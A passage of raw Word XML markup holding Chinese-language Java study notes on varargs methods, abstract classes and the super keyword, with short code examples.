        <w:t>public class VarargsDemo {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347CF8A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395AFF4C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r>
        <w:t>调用可变参数的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7300D309" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        printMax(34, 3, 3, 2, 56.5);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01ACE49A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        printMax(new double[]{1, 2, 3});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CAA3D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FB416C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    public static void printMax( </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>double... numbers</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A09BB6E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        if (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>numbers.length == 0</w:t>
      </w:r>
      <w:r>
        <w:t>) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226833B8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            System.out.println("No argument passed");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1294DBA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BA9BC2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F64D5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>double result = numbers[0];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0324ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        for (int i = 1; i &lt;  numbers.length; i++){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAC9C20" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            if (numbers[i] &gt;  result) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEE2D33" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                result = numbers[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B48D27F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C02B39" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4728C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        System.out.println("The max value is " + result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF48341" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115C4575" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE16243" w14:textId="1308DA00" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="559FFAFB" w14:textId="50A38E23" w:rsidR="00D86056" w:rsidRDefault="006B04C1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abstract</w:t>
      </w:r>
      <w:r w:rsidR="00D86056">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抽象类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC60104" w14:textId="157CBB58" w:rsidR="00D86056" w:rsidRDefault="000565FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000565FE">
        <w:t>https://ithelp.ithome.com.tw/articles/10231309</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F22A9C0" w14:textId="0FD6F947" w:rsidR="003260A0" w:rsidRDefault="003260A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4525DA0E" w14:textId="09491741" w:rsidR="003260A0" w:rsidRDefault="003260A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="540DD920" w14:textId="3C0B4A89" w:rsidR="0056644F" w:rsidRDefault="0056644F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F840"/>
        </w:rPr>
        <w:t>抽象方法是必须写在抽象类当中（当一个类中含有了抽象方法时，那么这个类一定是抽象类）</w:t>
      </w:r>
      <w:r w:rsidR="00D602CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F840"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00D602CE" w:rsidRPr="00D602CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F8F840"/>
        </w:rPr>
        <w:t>抽象类中是可以没有抽象方法的，有抽象方法一定就是抽象类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305BBEE9" w14:textId="77777777" w:rsidR="0056644F" w:rsidRDefault="0056644F" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D85BB9" w14:textId="77777777" w:rsidR="003260A0" w:rsidRDefault="003260A0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="152F41A4" w14:textId="5FDC51C8" w:rsidR="000565FE" w:rsidRDefault="000565FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>abstract</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>声明关键字如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC9A72B" w14:textId="77777777" w:rsidR="000565FE" w:rsidRPr="000565FE" w:rsidRDefault="000565FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000565FE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">abstract class Base { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391EDAF6" w14:textId="77777777" w:rsidR="000565FE" w:rsidRPr="000565FE" w:rsidRDefault="000565FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C78565" w14:textId="6FC2EE00" w:rsidR="00D86056" w:rsidRDefault="000565FE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000565FE">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488FBAAE" w14:textId="77777777" w:rsidR="00E96EB0" w:rsidRDefault="00E96EB0" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="102CCDD2" w14:textId="36146C69" w:rsidR="00D86056" w:rsidRDefault="00B843B6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>抽象方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(abstract method)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>非抽象方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00B843B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(concrete method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D7724E" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">abstract class Base {    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1948F467" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    void fun() { System.out.println("Base fun() called"); } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED4D3A2" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>abstract void fun2();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41434EB4" w14:textId="65C7BAE0" w:rsidR="00D86056" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DC406" w14:textId="0DC5BEAC" w:rsidR="00D86056" w:rsidRDefault="00D86056" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76309191" w14:textId="03591E49" w:rsidR="00D86056" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抽象类本身不可实例化，但是可以由其他类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>extends</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>继承来实例化：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1513721D" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00794A76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>abstract class Bike</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">{  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260D7E08" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  abstract void run();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA8B4EC" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5931AE87" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00794A76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>class Remote</w:t>
      </w:r>
      <w:r w:rsidRPr="00794A76">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> extends </w:t>
      </w:r>
      <w:r w:rsidRPr="00794A76">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Bike</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">{  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201675A" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">void run(){System.out.println("remote running);}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE6E0A1" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">public static void main(String args[]){  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364460C6" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> Bike obj = new Remote();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78414F23" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> obj.run();  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C85EF4B" w14:textId="77777777" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB8D85" w14:textId="3939FA92" w:rsidR="00B956DA" w:rsidRDefault="00B956DA" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75014F9F" w14:textId="4E58877D" w:rsidR="00D86056" w:rsidRDefault="00D86056" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3552A2A6" w14:textId="222ACA62" w:rsidR="00D86056" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以包含构造方法、静态方法、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>final</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C90DBA0" w14:textId="6C466356" w:rsidR="00D86056" w:rsidRDefault="00D86056" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="333E17B1" w14:textId="77777777" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">abstract class Base { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701FA376" w14:textId="77777777" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    Base() { System.out.println("Base Constructor Called"); } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CECE9F" w14:textId="77777777" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    abstract void fun(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A759DE0" w14:textId="77777777" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730A8E44" w14:textId="784FDA46" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">abstract class Base { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700BACD" w14:textId="77777777" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    final void fun() { System.out.println("called"); } </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635DCEC1" w14:textId="720B48E0" w:rsidR="00D86056" w:rsidRPr="00D86056" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C18248" w14:textId="7D366A52" w:rsidR="00D86056" w:rsidRDefault="00D86056" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B99C4BA" w14:textId="53438BD1" w:rsidR="00983851" w:rsidRDefault="00983851" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34811DAA" w14:textId="77777777" w:rsidR="0002471C" w:rsidRDefault="0002471C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="585BC691" w14:textId="77777777" w:rsidR="0002471C" w:rsidRPr="0002471C" w:rsidRDefault="0002471C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0002471C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>抽象类可以继承自抽象类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0CB648" w14:textId="0441FDB1" w:rsidR="002774FC" w:rsidRDefault="002774FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要是作用于子类的方法中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于指向父类对象</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以访问父类的属性、调用父类的普通方法和构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463A71FC" w14:textId="03DF1338" w:rsidR="002774FC" w:rsidRDefault="002774FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>子类的构造函数第一行会默认调用父类无参的构造函数，及隐式调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>super();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155389B6" w14:textId="2FB312A5" w:rsidR="002774FC" w:rsidRDefault="002774FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果父类中没有无参构造器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> , </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那么必须显示调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的有参构造方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B8D6D2" w14:textId="2BF29294" w:rsidR="002774FC" w:rsidRDefault="002774FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5. super</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能赋值给变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它只是一个指示编译器调用超类方法的特殊关键字。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EE1547" w14:textId="77777777" w:rsidR="002774FC" w:rsidRDefault="002774FC" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F4A29BE" w14:textId="4C122F99" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public abstract class AbstactPerson {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FB898A" w14:textId="0A3E9A44" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   private Integer id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05316D27" w14:textId="77F84366" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   private String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0D893" w14:textId="7793B0F3" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   public AbstactPerson(Integer id, String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734E63B0" w14:textId="7378AD0D" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">       this.id = id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11859CF8" w14:textId="32BF6454" w:rsidR="00392C59" w:rsidRDefault="00392C59" w:rsidP="009222EB">
